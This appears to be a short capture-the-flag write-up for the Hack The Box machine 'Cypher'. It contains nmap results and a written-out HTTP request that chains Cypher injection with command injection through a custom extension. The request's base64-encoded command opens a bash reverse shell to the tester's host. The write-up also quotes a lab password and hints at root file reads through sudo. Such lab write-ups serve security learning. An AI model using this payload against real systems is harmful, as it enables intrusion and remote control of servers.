Cypher

10.10.11.57

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Nmap 7.95 scan initiated Wed Apr 16 12:02:01 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.57
Nmap scan report for 10.10.11.57
Host is up, received echo-reply ttl 63 (0.14s latency).
Scanned at 2025-04-16 12:02:14 CST for 22s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMurODrr5ER4wj9mB2tWhXcLIcrm4Bo1lIEufLYIEBVY4h4ZROFj2+WFnXlGNqLG6ZB+DWQHRgG/6wg71wcElxA=
|   256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEqadcsjXAxI3uSmNBA8HUMR3L4lTaePj3o6vhgPuPTi
80/tcp open  http    syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://cypher.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 16 12:02:36 2025 -- 1 IP address (1 host up) scanned in 35.38 seconds

cypher.htb 添加到 hosts

fuzzing

ffuf
ffuf
api
api
testing
testing

下载 .jar 导入 jadx 查看源码

80站点

cypher-injection
登陆存在 cypher 注入
result
9f54ca4c130be6d529a56dee59dc2b2090e43ac 跑不出来
jadx-result
存在命令注入漏洞的扩展,构造 payload 命令执行 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /api/auth HTTP/1.1
Host: cypher.htb
Content-Length: 236
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Origin: http://cypher.htb
Referer: http://cypher.htb/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"username":"admin' or 1=1 \n RETURN h.value as hash union CALL custom.getUrlStatusCode('http://10.10.16.22:8001 && echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMjIvOTAwMSAgMD4mMSAn|base64 -d|bash') \n yield statusCode as value \n RETURN value as hash//","password":"123456"}
shell
shell

.bash_history 居然不是 /dev/null,看一眼
bash-history 

1
neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK

使用 graphasm:cU4btyib.20xtCMCXkBmerhK 成功登陆 ssh

提权

sudo
sudo
rules
rules

通过指定 rules 文件并开启 debug 实现 root 权限读取文件
root-flag